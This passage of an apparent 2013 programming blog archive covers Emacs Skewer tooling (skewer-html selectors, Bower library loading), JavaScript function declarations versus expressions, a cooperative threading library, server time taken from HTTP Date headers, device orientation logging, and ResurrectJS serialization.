To accomplish this, an important piece of skewer-html exists to compute this CSS selector. It’s a purely structural selector, ignoring classes, IDs, and so on, instead relying on the pseudo-selector :nth-of-type. For example, say this is the content of the buffer and the point is somewhere inside the second heading (Bar).


  
  
<html>
  <head></head>
  <body>
    <div id="main">
      <h1>Foo</h1>
      <p>I am foo.</p>
      <h1>Bar</h1>
      <p>I am bar.</p>
    </div>
  </body>
</html>

The function skewer-html-compute-selector will generate this selector. Note that :nth-of-type is 1-indexed.

body:nth-of-type(1) > div:nth-of-type(1) > h1:nth-of-type(2)

The > syntax requires that these all be direct descendants and :nth-of-type allows it to ignore all those paragraph elements. This means other types of elements can be added around these headers, like additional paragraphs, without changing the selector. The :nth-of-type on body is obviously unnecessary, but this is just to keep skewer-html dead simple. It doesn’t need to know the semantics of HTML, just the surface syntax. There will only ever be one body tag, but to skewer-html it’s just another HTML tag.

Side note: this is why I strongly prefer to use /> self-closing syntax in HTML5 even though it’s unnecessary. Unlike XML, that closing slash is treated as whitespace and it’s impossible to self-close tags. The schema specifies which tags are “void” (always self-closing: img, br) and which tags are “normal” (explicitly closed: script, canvas). This means if you don’t use /> syntax, your editor would need to know the HTML5 schema in order to properly understand the syntax. I prefer not to require this of a text editor — or anything else doing dumb manipulations of HTML text — especially with the HTML5 specification constantly changing.

When I was writing this I originally included html in the selector. Selector computation would just walk up to the root of the document regardless of what the tags were. Curiously, including this causes the selector to fail to match even though this is literally the page structure. So, out of necessity, skewer-html knows enough to leave it off.
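
The real selector computation is Emacs Lisp working on buffer text. The JavaScript below is only a sketch of the idea, using a hypothetical plain-object tree instead of a buffer. It walks up from the target, counting same-tag siblings at each level, and stops before the root so that html is left off.

```javascript
// Build a tree node and point each child back at its parent.
function node(tag, children) {
    var n = {tag: tag, parent: null, children: children || []};
    n.children.forEach(function(child) { child.parent = n; });
    return n;
}

// Compute a purely structural selector for target.
function computeSelector(target) {
    var parts = [];
    for (var n = target; n.parent !== null; n = n.parent) {
        var siblings = n.parent.children;
        var index = 0;
        for (var i = 0; i < siblings.length; i++) {
            if (siblings[i].tag === n.tag) index++;  // :nth-of-type is 1-indexed
            if (siblings[i] === n) break;
        }
        parts.unshift(n.tag + ':nth-of-type(' + index + ')');
    }
    return parts.join(' > ');
}

var bar = node('h1');
node('html', [
    node('head'),
    node('body', [
        node('div', [node('h1'), node('p'), bar, node('p')])
    ])
]);
computeSelector(bar);
// => "body:nth-of-type(1) > div:nth-of-type(1) > h1:nth-of-type(2)"
```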

For replacement, rather than a simple innerHTML assignment on the selected element, Skewer is parsing the HTML into a node object, removing the selected node object, and putting the new one in its place. The reason for this is that I want to include all of the replacement element’s attributes.

Another HTML oddity is that the body and head elements cannot be replaced. It’s a limitation of the DOM. This means these tags cannot be “evaluated” directly, only their descendants. Brian and I also ran into this issue in impatient-mode while trying to work around a strange HTML encoding corner case: scripts loaded with a script tag created by document.write() are parsed with a different encoding than when loaded directly by adding a script element to the page.

This last part is actually a small saving grace for skewer-css, which works by appending new stylesheets to the end of body. Why body and not head? Because some documents out there have stylesheets linked from body, and properly overriding these requires appending stylesheets after them. If body is replaced by skewer-html, all of the dynamic stylesheets appended by skewer-css would be lost, reverting the style of the page. Since we can’t do that, this isn’t an issue!

Appending HTML

So what happens when the selector doesn’t match anything in the current document? Skewer fills in the missing part of the structure and sticks the content in the right place. Next time the tag is evaluated, the structure exists and it becomes a replacement operation. This means the document in the browser can start completely empty (like the run-skewer page) and you can fill in content as you write it.

But what if the page already has content? There’s an interactive command skewer-html-fetch-selector-into-buffer. You select a part of the page and it gets inserted into the current buffer (probably a scratch buffer). The idea is that you can then modify and then evaluate it to update the page. This is the roughest part of skewer-html right now since I’m still figuring out a good workflow around it.

If you have Skewer installed and updated, you already have skewer-html. It was merged into master about a month ago. If you have any ideas or opinions for how you think this minor mode should work, please share them. The intended workflow is still not a fully-formed idea.

Load Libraries in Skewer with Bower

2013-05-18T00:00:00Z

I recently added support to Skewer for loading libraries on the fly using Bower’s package infrastructure. Just make sure you’re up to date, then while skewering a page run M-x skewer-bower-load. It will prompt for a package and version, download the library, then inject it into the currently skewered page.

Because the Bower infrastructure is so simple, Bower is not actually needed in order to use this. Only Git is required, configured by skewer-bower-git-executable, which it tries to configure itself from Magit if it’s been loaded.

Motivation

Skewer comes with a userscript that adds a small toggle button to the top-right corner of every page I visit. Here’s a screenshot of the toggle on this page.

When that little red triangle is clicked, the page is connected to Emacs and the triangle turns green. Click it again and it disconnects, turning red. It remembers its state between page refreshes so that I’m not constantly having to toggle.

It’s mainly for development purposes, but it’s occasionally useful to Skewer an arbitrary page on the Internet so that I can poke at it from Emacs. One habit that I noticed comes up a lot is that I want to use jQuery as I fiddle with the page, but jQuery isn’t actually loaded for this page. What I’ll do is visit a jQuery script in Emacs and load this buffer (C-c C-k). As expected, this is tedious and easily automated.

Rather than add specific support for jQuery, I thought it would be more useful to hook into one of the existing JavaScript package managers. Not only would I get jQuery but I’d be able to load anything else provided by the package manager. This means if I learn about a cool new library, chances are I could just switch to my *javascript* scratch buffer, load the library with this new Skewer feature, and play with it. Very convenient.

How it Works

There are a number of package managers out there. I chose Bower because of its emphasis on client-side JavaScript and, more so, because its infrastructure is so simple that I wouldn’t actually need to use Bower itself to access it. In adding this feature to Skewer, I wrote half a Bower client from scratch very easily.

The only part of the Bower infrastructure hosted by Bower itself is a tiny registry that maps package names to Git repositories. This host also accepts new mappings, unauthenticated, for registering new packages. The entire database is served up as plain old JSON.

https://bower.herokuapp.com/packages

To find out what versions are available, clone this repository with Git and inspect the repository tags. Tags that follow the Semantic Versioning scheme are versions of the package available for use with Bower. Once a version is specified, look at bower.json in the tree-ish referenced by that tag to get the rest of the package metadata, such as dependencies, endpoint listing, and description.
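The tag-filtering step can be sketched in a few lines. This is only an illustration, not Skewer's actual code: semverTags is a hypothetical helper, the tag names are made up, and accepting a leading "v" is my own assumption.

```javascript
// Hypothetical helper: keep only the tags that look like MAJOR.MINOR.PATCH
// (optionally prefixed with "v", an assumption of this sketch) and sort
// them from oldest to newest. Pre-release and build suffixes are ignored.
function semverTags(tags) {
    var pattern = /^v?(\d+)\.(\d+)\.(\d+)$/;
    return tags.map(function(tag) {
        var match = pattern.exec(tag);
        return match && {
            tag: tag,
            parts: match.slice(1).map(Number)
        };
    }).filter(Boolean).sort(function(a, b) {
        for (var i = 0; i < 3; i++) {
            if (a.parts[i] !== b.parts[i]) {
                return a.parts[i] - b.parts[i];
            }
        }
        return 0;
    }).map(function(entry) {
        return entry.tag;
    });
}

// Made-up tag list, as might be reported by `git tag`:
var versions = semverTags(['1.10.0', 'release-2', '1.9.1', 'v2.0.0', 'latest']);
versions; // => ["1.9.1", "1.10.0", "v2.0.0"]
```

The comparison is numeric per component, so 1.10.0 correctly sorts after 1.9.1, which a plain string sort would get wrong.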

This is all very clever. The Bower registry doesn’t have to host any code, so it remains simple and small. It could probably be rewritten from scratch in 15-30 minutes. Almost all the repositories are on GitHub, which most package developers are already comfortable with. Package maintainers don’t need to use any tools or interact with any new host systems. Except for adding some metadata they just keep doing what they’re doing. I think this last point is a big part of MELPA’s success.

Bower’s Fatal Weaknesses

Unfortunately Bower has two issues, one of which is widespread, that seriously impact its usefulness.

Dependency Specification

Even though Bower specifies Semantic Versioning for package versions, which very precisely describes version syntax and semantics, the dependencies field in bower.json is underspecified. There’s no agreed-upon method for specifying relative dependency versions.

Say your package depends on jQuery and it relies on the newer jQuery 1.6 behavior of attr(). You would mark down that you depend on jQuery 1.6.0. Say a user of your package is also using another package that depends on jQuery. That package uses the on() method, which requires jQuery 1.7 or newer, so it specifies jQuery 1.7.0. This is a dependency conflict.

Of course your package works perfectly fine with 1.7.0. It works fine at 1.6.0 and later. In other package management systems, you would probably have marked that you depend on “>=1.6.0” rather than just 1.6.0. Unfortunately, Bower doesn’t specify this as a valid dependency version. Some package maintainers have gone ahead and specified relative versions anyway, but inconsistently. Some use the “>=” prefix like I did above, some prefix with “~” (“about this version”), which is pretty useless.
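To make the difference concrete, here is a small sketch of a matcher that understands only an exact version and a ">=" minimum. The function names are hypothetical, and this is not behavior that Bower specifies.

```javascript
// Split "1.6.0" into [1, 6, 0].
function parseVersion(string) {
    return string.split('.').map(Number);
}

// Negative, zero, or positive, like a sort comparator.
function compareVersions(a, b) {
    for (var i = 0; i < 3; i++) {
        if (a[i] !== b[i]) return a[i] - b[i];
    }
    return 0;
}

// Hypothetical matcher: "1.6.0" means exactly that version,
// ">=1.6.0" means that version or anything newer.
function satisfies(version, spec) {
    var minimum = /^>=/.test(spec);
    var wanted = parseVersion(spec.replace(/^>=/, ''));
    var order = compareVersions(parseVersion(version), wanted);
    return minimum ? order >= 0 : order === 0;
}

satisfies('1.7.0', '1.6.0');   // => false, the conflict described above
satisfies('1.7.0', '>=1.6.0'); // => true
satisfies('1.5.2', '>=1.6.0'); // => false
```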

And this leads into the other flaw.

Most Bower Packages are Broken

While some parts of Bower are underspecified, most packages don’t follow the simple specifications that already exist! That is to say, most Bower packages are broken. This is incredibly unfortunate because it means at least half of the packages can’t be loaded by this new Skewer feature.

How are they broken? As of this writing, there are 2,195 packages listed in Bower’s registry.

113 (5%) of them have unreachable or unresponsive repositories. About half of these are due to invalid repository URLs.
1,830 (83%) have no bower.json metadata file. This means the client has to guess at the metadata.
1,034 (47%) have unguessable endpoints. My client looks for other package management metadata outside of Bower’s, as well as tries to guess based on the package name. Failing to guess causes the package to fail to load. These packages aren’t a subset of the last set with missing bower.json files. Sometimes the bower.json files contain incorrect information, which causes my client to drop into guessing mode.
1,400 (64%) don’t use Semantic Versioning: either no versioning at all or some other arbitrary versioning system.
In total, 2,041 (93%) of all Bower packages have invalid or missing metadata: a bad registry entry, a missing bower.json file, or a lack of semantic version tags.

The good news is that most of the important libraries, like jQuery and Underscore, work properly. I’ve also registered two of my JavaScript libraries, ResurrectJS and rng-js, so these can be loaded on the fly in Skewer.

JavaScript Function Statements vs. Expressions

2013-05-14T00:00:00Z

The JavaScript function keyword has two meanings depending on how it’s used: as a statement or as an expression. It’s a statement when the keyword appears at the top-level of a block. This is known as a function declaration.

function foo() {
    // ...
}

This statement means declare a variable called foo in the current scope, create a closure named foo, and assign this closure to this variable. Also, this assignment is “lifted” such that it happens before any part of the body of the surrounding function is evaluated, including before any variable assignments.

Notice that the closure’s name is separate from the variable name. Except for a certain well-known JavaScript engine, closure/function objects have a read-only name property.

foo.name; // => "foo"

A name is required for function declarations, otherwise they would be no-ops. This name also appears in debugging backtraces.

A function’s name has different semantics in function expressions. The function keyword is an expression when used in an expression position of a statement.

var foo = function() {
    // ...
}

The function expression above evaluates to an anonymous closure, which is then assigned to the variable foo. This is nearly identical to the previous function declaration except for two details.

Explicit variable assignments are never lifted, unlike function declarations. This assignment will happen exactly where it appears in the code.
The resulting closure is anonymous. The name property, if available, will be an empty string. Furthermore, the lack of name affects the scope of the function. I’ll get back to that point in a moment.
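The lifting difference is easy to observe. In this sketch (the names demo, declared, and expressed are just for illustration), the declaration is usable before the line it appears on, while the expression's variable exists but is still undefined.

```javascript
function demo() {
    var results = [];

    // The declaration below is lifted, so `declared` is already a function.
    results.push(typeof declared);

    // Only the variable `expressed` is lifted, not its assignment.
    results.push(typeof expressed);

    function declared() {}
    var expressed = function() {};

    // After the assignment has run, the variable holds the closure.
    results.push(typeof expressed);
    return results;
}

demo(); // => ["function", "undefined", "function"]
```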

IIFEs

An immediately-invoked function expression (IIFE), used to establish a one-off local scope, is typically wrapped in parentheses. The purpose of the parentheses is to put function in an expression position so that it is a function expression rather than a function declaration.

(function() {
    // ... declare variables, etc.
}());

Another way to put function in an expression position is to precede it with a unary operator. This is an example of being clever instead of practical.

!function() {
    // ... declare variables, etc.
}();

If function is already in an expression position, the wrapping parentheses are unnecessary. For example,

var foo = function() { return "bar"; }();
foo; // => "bar"

However, it may still be a good idea to wrap the IIFE in parentheses just to help other programmers read your code. A casual glance that doesn’t notice the function invocation would assume a function is being assigned to foo. Wrapping a function expression with parentheses is a well-known idiom for IIFEs.

Function Name and Scope

What happens when a function expression is given a name? Two things.

The name will appear in the name property of the closure (if available). The name will also show up in backtraces. This makes naming closures a handy debugging technique.
The name becomes a variable in the scope of the function. This means it’s possible to write recursive function expressions!

function maths() {
    return {
        // ...
        fact: function fact(n) {
            return n === 0 ? 1 : n * fact(n - 1);
        }
    };
}

maths().fact(10); // => 3628800

The fact function is evaluated as a function expression as part of this object literal. The variable fact is established in the scope of the function fact, assigned to the function itself, allowing the function to call itself. It’s a self-contained recursive function.

Pop Quiz: Function Name and Scope

Given this, try to determine the answer to this problem in your head. What does the second invocation of foo evaluate to?

function foo() {
    foo = function() {
        return "function two";
    };
    return "function one";
}

foo(); // => "function one"
foo(); // => ???

Here’s where we come to the major difference between function declarations and function expressions. The answer is "function two". Even though function declarations create named functions, these functions do not have the implicit self-named variable in their scope. Unless this variable is declared explicitly, the name will refer to a variable in a containing scope.

This has the useful property that a function can re-define itself and be correctly named at the same time. If the function needs to perform expensive first-time initialization, such reassignment can be used to do it lazily without exposing any state and without requiring an is-initialized check on each invocation. For example, this trick is exactly how Emacs autoloading works.
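Here is a minimal sketch of that lazy initialization trick. The names getTable and initCount are made up for the example, and the loop is only a stand-in for genuinely expensive work.

```javascript
var initCount = 0;  // only here to show how often initialization runs

function getTable() {
    // Stand-in for expensive first-time initialization.
    initCount++;
    var table = [];
    for (var i = 0; i < 256; i++) {
        table.push(i * i);
    }
    // Replace this function with one that closes over the result, so
    // later calls skip the work and need no is-initialized check.
    getTable = function() {
        return table;
    };
    return table;
}

getTable()[3]; // => 9, runs the initialization
getTable()[4]; // => 16, initialization is skipped
initCount;     // => 1
```

The table itself stays hidden in the closure, so callers only ever see the getTable name.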

If this function declaration is converted to what appears to be the equivalent function expression form, the difference is obvious.

var foo = function foo() {
    foo = function() {
        return "function two";
    };
    return "function one";
};

foo(); // => "function one"
foo(); // => "function one"

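The reassignment targets the self-named variable in the function’s own scope, leaving the outer scope’s assignment intact. That inner variable is read-only, so the assignment is silently ignored (in strict mode it throws a TypeError instead). For better or worse, even ignoring assignment lifting, there’s no way to perfectly emulate function declaration using a function expression.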
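Strict mode makes the inner variable visible. As far as I understand the specification, the self-named binding of a function expression is immutable, so a strict-mode function refuses the assignment outright. A sketch:

```javascript
var foo = function foo() {
    'use strict';
    try {
        // Attempt to overwrite the function's own inner name.
        foo = function() {
            return "function two";
        };
    } catch (e) {
        return e instanceof TypeError ? "TypeError" : "other error";
    }
    return "function one";
};

foo(); // => "TypeError"
foo(); // => "TypeError", the outer foo was never replaced
```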

Inventing a Datetime Web Service

2013-05-11T00:00:00Z

Recently I wanted to experiment with dates in a JavaScript web app. The JavaScript Date object is a fairly decent tool for working with dates. Unfortunately, it has some annoyances:

It doesn’t play well with JSON. JSON.stringify() flattens it into a string, so the JSON.parse() on the other side doesn’t turn it back into a Date object. I made a library, ResurrectJS, to deal with this.
Dates are mutable. The same mistake was made in Java in the last century. However, in the JavaScript world this isn’t really a big deal. The language doesn’t really support immutability well at the moment anyway. There is Object.freeze() but JavaScript engines don’t optimize for it yet.
Inconsistent indexing. Months are 0-indexed while days are 1-indexed. The date “2013-05-11” is awkwardly instantiated with the arguments new Date(2013, 4, 11). This is another repeat of an early Java design mistake.
Date objects have timezones and there’s no way to set the timezone. A Date represents an instant in time, regardless of the local timezone, and the timezone only matters when the Date is being formatted as a human-readable string. When formatting a Date into a string there’s no way to specify the timezone. There’s a getTimezoneOffset() method for asking about the Date’s timezone, but no corresponding setTimezoneOffset().
It relies on the local computer’s time. This isn’t actually a flaw in Date. Where else would it get the time? This just happened to be an obstacle for my particular experiment. This issue is also the purpose of this post.
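A few of these annoyances can be seen directly in a console. This short sketch uses only standard Date and JSON calls; the variable names are arbitrary.

```javascript
// Months are 0-indexed while days of the month are 1-indexed.
var date = new Date(2013, 4, 11);
date.getMonth(); // => 4 (May)
date.getDate();  // => 11

// A Date does not survive a JSON round trip: it comes back as a string.
var original = {when: new Date(0)};
var copy = JSON.parse(JSON.stringify(original));
typeof copy.when; // => "string"
copy.when;        // => "1970-01-01T00:00:00.000Z"

// Dates are mutable, so anyone holding a reference can change it.
date.setFullYear(2014);
date.getFullYear(); // => 2014
```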

Existing Datetime Services

So if I don’t trust the local system time to be precise, where can I get a more accurate time? Surely there are web services out there for it, right? NIST operates time.gov and maybe that has a web API for web applications. I don’t need to be super precise — a web API could never be — just within a couple of seconds.

Turns out there isn’t any such web service, at least not a reliable one. Yahoo used to provide one called getTime, but it’s been shut down. In my searches I also came across this:

http://json-time.appspot.com/time.json (GitHub)

It supports JSONP, which is almost exactly what I need. Unfortunately, it’s just a free Google App Engine app, so it’s unavailable most of the time due to being over quota. In fact, at the time of this writing it is down.

I could stand up my own server for the task, but that costs both time and money, so I’m not really interested in doing that. It’s liberating to build web apps that don’t require that I run a server. There are so many nice web APIs out there that do the hard part for me. I can just put my app on GitHub’s free static hosting, like this blog. The biggest obstacle is dealing with the same-origin policy. JSONP isn’t always supported and very few of these APIs support CORS, even though they easily could. This is part of the web that’s still maturing. My personal guess is that WebSockets will end up filling this role rather than CORS.

Deriving a Datetime Service

So I was thinking about how I could get around this. Surely some API out there includes a date in its response and I could just piggyback off that. This is when the lightbulb went off: web servers hand out date strings all the time! It’s a standard HTTP header: Date! Even my own web server does this.

function getServerDate() {
    var xhr = new XMLHttpRequest();
    xhr.open('HEAD', '/?nocache=' + Math.random(), false);
    xhr.send();
    return new Date(xhr.getResponseHeader('Date'));
}

This makes a synchronous XMLHttpRequest to the page’s host, being careful to cache bust so that I’m not handed a stale date. I’m also using a HEAD request to minimize the size of the response. Personally, I trust the server’s clock precision more than the client’s. Here it is in action.

Local: ---

Server: ---

This is probably not too exciting because you should be within a couple of seconds of the server. If you’re feeling ambitious, change your local system time by a few minutes and refresh the page. The server time should still be accurate while your local time is whatever incorrect time you set.

Here’s the code for these clocks:

var Demo = Demo || {};

Demo.setDate = function(id, date) {
    document.getElementById(id).innerHTML = date;
};

Demo.offset = Demo.getServerDate() - Date.now();

setInterval(function() {
    var date = new Date();
    Demo.setDate('time-local', date);
    Demo.setDate('time-server', new Date(Demo.offset + date.valueOf()));
}, 1000 / 15);
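The offset arithmetic can also be checked without a server. In this sketch clockOffset and serverTime are hypothetical helpers and the header and local time are made-up values. Keep in mind that the HTTP Date header only has one-second resolution, so the offset can't be any more precise than that.

```javascript
// Hypothetical helper: server-minus-local offset in milliseconds, given
// the text of a Date header and a local timestamp taken at the same time.
function clockOffset(dateHeader, localNow) {
    return Date.parse(dateHeader) - localNow;
}

// Apply a previously computed offset to a local timestamp.
function serverTime(offset, localNow) {
    return new Date(localNow + offset);
}

// Made-up values: the local clock is 90 seconds behind the server.
var header = 'Sat, 11 May 2013 12:00:00 GMT';
var local = Date.UTC(2013, 4, 11, 11, 58, 30);
var offset = clockOffset(header, local);
offset; // => 90000
serverTime(offset, local).toISOString();
// => "2013-05-11T12:00:00.000Z"
```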

You know what? I think this is better than some random datetime web service anyway.

Userspace Threading in JavaScript

2013-04-28T00:00:00Z

There was an interesting Daily Programmer problem posted a couple of weeks ago: write a userspace threading library. I decided to do it in JavaScript, building it on top of setTimeout. Remember that JavaScript is single-threaded by specification, so this will be a nonpreemptive, cooperative system.

Start by creating the Thread prototype. As thread constructors usually work, it accepts the function to be run in that thread.

function Thread(f) {
    this.alive = true;
    this.schedule(f);
}

The schedule method schedules a function to be run in that thread. It’s not really meant for users to use directly. I’ll define it in a moment.

Only one thread actually runs at a time, so globally keep track of which one is running at the moment.

Thread.current = null;

Now here’s the core method that makes everything work, runner. It accepts a function of arbitrary arity and returns a function that runs the provided function in this thread.

Thread.prototype.runner = function(f) {
    var _this = this;
    return function() {
        if (_this.alive) {
            try {
                Thread.current = _this;
                f.apply(this, arguments);
            } finally {
                Thread.current = null;
            }
        }
    };
};

The runner sets the current thread to the proper value, calls the function, then clears the current thread. If the thread is no longer active, nothing happens.

With that in place, schedule is defined like this,

Thread.prototype.schedule = function(f) {
    setTimeout(this.runner(f), 0);
};

It creates a runner function for f and schedules it to run as soon as possible on JavaScript’s event loop using setTimeout. Queuing up on the event loop is the cooperative part of all this. Other threads and events may already be queued with a timeout of 0, so they run first.

Technically this is all that’s needed. To yield, schedule a function and return.

function() {
    // ... do some work ...
    Thread.current.schedule(function() {
        // ... do more work ...
    });
}

I don’t want the user to need to think about Thread.current, so here’s a convenience yield function.

Thread.yield = function(f) {
    Thread.current.schedule(f);
};

Now to use it,

function() {
    // ... do some work ...
    Thread.yield(function() {
        // ... do more work ...
    });
}

Halting a thread is easy. Any scheduled functions for this thread will not be invoked, as specified in the runner method.

Thread.prototype.destroy = function() {
    this.alive = false;
};
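Putting the pieces so far together, here is a sketch of two threads taking turns. To make the order easy to inspect without waiting on timers, it swaps setTimeout for a hand-drained queue. The defer, drain, and counter names are hypothetical and exist only for this demonstration.

```javascript
// Stand-in for the event loop: a FIFO queue drained by hand.
// This replaces setTimeout(f, 0) purely to make the order deterministic.
var queue = [];
function defer(f) { queue.push(f); }
function drain() {
    while (queue.length > 0) queue.shift()();
}

function Thread(f) {
    this.alive = true;
    this.schedule(f);
}
Thread.current = null;
Thread.prototype.runner = function(f) {
    var _this = this;
    return function() {
        if (_this.alive) {
            try {
                Thread.current = _this;
                f.apply(this, arguments);
            } finally {
                Thread.current = null;
            }
        }
    };
};
Thread.prototype.schedule = function(f) {
    defer(this.runner(f));
};
Thread.prototype.destroy = function() {
    this.alive = false;
};
Thread.yield = function(f) {
    Thread.current.schedule(f);
};

// Each thread logs a few numbered steps, yielding between them.
var log = [];
function counter(name, limit) {
    var n = 0;
    return function step() {
        log.push(name + n++);
        if (n < limit) Thread.yield(step);
    };
}

var a = new Thread(counter('a', 3));
var b = new Thread(counter('b', 3));
drain();
log; // => ["a0", "b0", "a1", "b1", "a2", "b2"]

// A destroyed thread's scheduled functions are never invoked.
var c = new Thread(counter('c', 1000));
c.destroy();
drain();
log.length; // => 6
```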

There’s one more situation to worry about: callbacks. Imagine an asynchronous storage API.

// ... in thread context ...
storage.getValue(function(value) {
    // doesn't run in thread context
});

In order to run in the thread the library user would need to create a runner function for the current thread. To avoid making them worry about Thread.current and runner, provide another convenience function, wrap. There may be a better name for it, but I couldn’t think of it.

Thread.wrap = function(f) {
    return Thread.current.runner(f);
};

Fixing the callback,

// ... in thread context ...
storage.getValue(Thread.wrap(function(value) {
    // ... also in thread context ...
}));

Threading Demo

To demonstrate threading I’ll make a thread that continuously fetches random numbers from a server and displays them.

Here’s a simple-httpd servlet for generating numbers. The route for this servlet will be /random.

(defservlet random text/plain ()
  (princ (random* 1.0)))

Since I’m doing this interactively with Skewer on the blank demo page, make a tag for displaying the number.

var h1 = document.createElement('h1');
document.body.appendChild(h1);

Here’s the function that will run in the thread. It fetches a number asynchronously, displays it, then recurses. Notice that Thread.yield() acts like a trampoline, providing free tail-call optimization! This is because the stack is cleared before the provided function is invoked.

function random() {
    var xhr = new XMLHttpRequest();
    xhr.open('GET', '/random', true);
    xhr.send();
    xhr.onload = Thread.wrap(function() {
        h1.innerHTML = xhr.responseText;
        Thread.yield(random);
    });
}

I set onload after calling send just for code organization purposes. That code is evaluated after send is called. As far as I know this should work fine.
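On the trampoline point: the effect can be shown in isolation with a plain queue standing in for the event loop. This is a sketch of the general technique, with hypothetical names bounce and run, rather than anything from the thread library itself.

```javascript
// A minimal trampoline: instead of calling the next step directly,
// each step hands it to a queue, and a flat loop runs the queue.
var pending = [];
function bounce(f) { pending.push(f); }
function run() {
    while (pending.length > 0) pending.shift()();
}

var count = 0;
function step() {
    count++;
    // "Recursion" without stack growth: step has returned
    // before the next step is invoked by run().
    if (count < 100000) bounce(step);
}

bounce(step);
run();
count; // => 100000
```

Each step returns before the next one starts, so the call stack never gets deeper than run plus a single step.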

Now to create a thread!

var foo = new Thread(random);

The heading flashes with random numbers as soon as the thread is created. Even though this thread is continuously running, it’s frequently yielding. Everything remains responsive, including the ability to stop the thread.

foo.destroy();

As soon as this is evaluated, the heading stops being updated. I think that’s pretty neat!

Performance

I haven’t tested performance, but I imagine it’s awful, especially because of the frequent use of the apply method. You wouldn’t want CPU-intensive operations to cooperate like this. Fortunately, in my demo above I’m manipulating the DOM and waiting on a server response, so the performance penalties of threading should be negligible.

Tracking Mobile Device Orientation with Emacs

2013-04-27T00:00:00Z

Nine years ago I bought my first laptop computer. For the first time I could carry my computer around and do productive things at places beyond my desk. In the meantime a new paradigm of mobile computing has arrived. Following a similar pattern, this month I bought a Samsung Galaxy Note 10.1, an Android tablet computer. Having never owned a smartphone, this is my first taste of modern mobile computing.

Once the technology caught up, laptops were capable enough to fully replace desktops. However, this tablet is no replacement for my laptop. Mobile devices are purely for consumption, so I will continue to use desktops and laptops for the majority of my computing. I’m writing this post on my laptop, not my tablet, for example.

Owning a tablet has opened up a whole new platform for me to explore as a programmer. I’m not particularly interested in writing Android apps, though. I’m obviously not alone in this, as I’ve found that nearly all Android software available right now is somewhere between poor and mediocre in quality. The hardware was worth the cost of the device, but the software still has a long way to go. I’m optimistic about this so I have no regrets.

A New Web Platform

Instead, I’m interested in mobile devices as a web platform. Among the few high-quality pieces of software on Android are the web browsers (Chrome and Firefox), and I’m already familiar with developing for these. Even more, I can develop software live on the tablet remotely from my laptop using Skewer, i.e. the exact same development tools and workflow I’m already using.

What’s new and challenging is the user interface. Instead of traditional clicking and typing, mobile users tap, hold, swipe, and even tilt the screen. Most challenging of all is probably accommodating both kinds of interfaces at once.

One of the first things I wanted to play with after buying the tablet was the gyro. The tablet knows its acceleration and orientation at all times. This information can be accessed in JavaScript using a fairly new API. The two events of interest are ondevicemotion and ondeviceorientation. Using simple-httpd I can transmit all this information to Emacs as it arrives.

Instead of writing a new servlet for this, to try it out I used skewer.log(). Connect a web page viewed on the tablet to Skewer hosted on the laptop, then evaluate this in a js2-mode buffer on the laptop.

window.addEventListener('devicemotion', function(event) {
    var a = event.accelerationIncludingGravity;
    skewer.log([a.x, a.y, a.z]);
});

Or for orientation,

window.addEventListener('deviceorientation', function(event) {
    skewer.log([event.alpha, event.beta, event.gamma]);
});

These orientation values appeared in my *skewer-repl* buffer as I casually rolled the tablet on one axis. The units are obviously degrees.

[157.4155398727678, 0.38583511837777246, -44.61023992234689]
[155.4477623728871, -0.6438986350040569, -44.69645057005079]
[154.32208572596647, -0.7516393196323073, -45.79730289443301]
[155.437674183483, -0.48375529832044045, -46.406449900466015]
[156.2974174150692, 0.21938214098430556, -47.482812581579154]
[154.85869270791937, 0.11046702400456986, -48.67378583696511]
[153.3284161451347, -0.9344782009891125, -48.61755630462298]
[154.11860073021347, -0.6553947505116874, -49.949668589018074]
[155.85919247792117, 0.05473832995756562, -49.84400214746339]
[156.92487274317241, 0.4946305069438346, -49.86369016774595]
[158.06542554210534, 0.712759801803332, -49.61875275392013]
[159.356905031128, 1.3387109941852697, -49.9372717956745]

It would be neat to pump these into a 3D plot display as they come in, such that my laptop displays the current tablet orientation on the screen as I move it around, but I didn’t see any quick way to do this.

Here are some acceleration values at rest. Since I took these samples on Earth the units are obviously in meters per second per second.

[-0.009576806798577309, 0.31603461503982544, 9.816226959228516]
[-0.047884032130241394, 0.3064578175544739, 9.806650161743164]
[-0.009576806798577309, 0.28730419278144836, 9.787496566772461]
[0.009576806798577309, 0.3064578175544739, 9.816226959228516]
[-0.06703764945268631, 0.3256114423274994, 9.797073364257812]
[-0.047884032130241394, 0.2968810200691223, 9.864110946655273]
[-0.028730420395731926, 0.2968810200691223, 9.576807022094727]
[-0.019153613597154617, 0.363918662071228, 9.691728591918945]
[-0.05746084079146385, 0.3734954595565796, 10.199298858642578]
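As a sanity check on the units, the magnitude of a sample taken at rest should be close to standard gravity, about 9.81 m/s². Here is a quick sketch using the first sample above; magnitude is a helper I made up for the example.

```javascript
// Magnitude of a 3-component acceleration vector.
function magnitude(v) {
    return Math.sqrt(v[0] * v[0] + v[1] * v[1] + v[2] * v[2]);
}

// First sample from the list above.
var sample = [-0.009576806798577309, 0.31603461503982544, 9.816226959228516];
magnitude(sample).toFixed(2); // => "9.82"
```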

Now that I have the hardware for it, I really want to use this API to do something interesting in a web application. I just don’t have any specific ideas yet.

Precise JavaScript Serialization with ResurrectJS

2013-03-28T00:00:00Z

One of the problems I needed to solve while writing my 7DRL was serializing the game’s entire state for a future restore. It needed to automatically save the game so that the player could close their browser/tab and continue the game later from where they left off. I attempted to use HydrateJS, but finding it inadequate for the task I rolled my own solution from scratch.

After the week ended, I ripped my solution out of the game, filled in the rest of the missing features, and created a precise serialization library called ResurrectJS. It can do everything HydrateJS is meant to do and more: Dates, RegExps, and DOM objects.

https://github.com/skeeto/resurrect-js

It works with all the major browsers, including You Know Who.

To demonstrate, here’s another Greeter prototype.

function Greeter(name) {
    this.name = name;
}
Greeter.prototype.greet = function() {
    return "Hello, my name is " + this.name;
};

var kelsey = new Greeter('Kelsey');
kelsey.greet();
// => "Hello, my name is Kelsey"

ResurrectJS can serialize kelsey for storage, including behavior. I’m creating new Resurrect objects each time just to show that this definitely works across different instances. Nothing up my sleeves! There’s no reason to avoid reusing Resurrect objects because the only state they maintain between method calls is their configuration.

var string = null;
string = new Resurrect().stringify(kelsey);
// => '[{"#":"Greeter","name":"Kelsey"}]'

kelsey;
// => {"name":"Kelsey","#id":null}

Notice that the serialization format is a bit unusual: it’s wrapped in an array. It’s still a valid JSON encoding. Also notice that kelsey gained a new property, #id, assigned to null, but this property was not encoded. I’ll explain all this below.

Here’s object resurrection.

var zombie = null;
zombie = new Resurrect().resurrect(string);
// => {"#":"Greeter","name":"Kelsey"}

zombie.greet();
// => "Hello, my name is Kelsey"

zombie === kelsey;  // A whole new object
// => false

The resurrected object has a # property. As explained before this is used to link the object back into the prototype chain so that its behavior is restored.
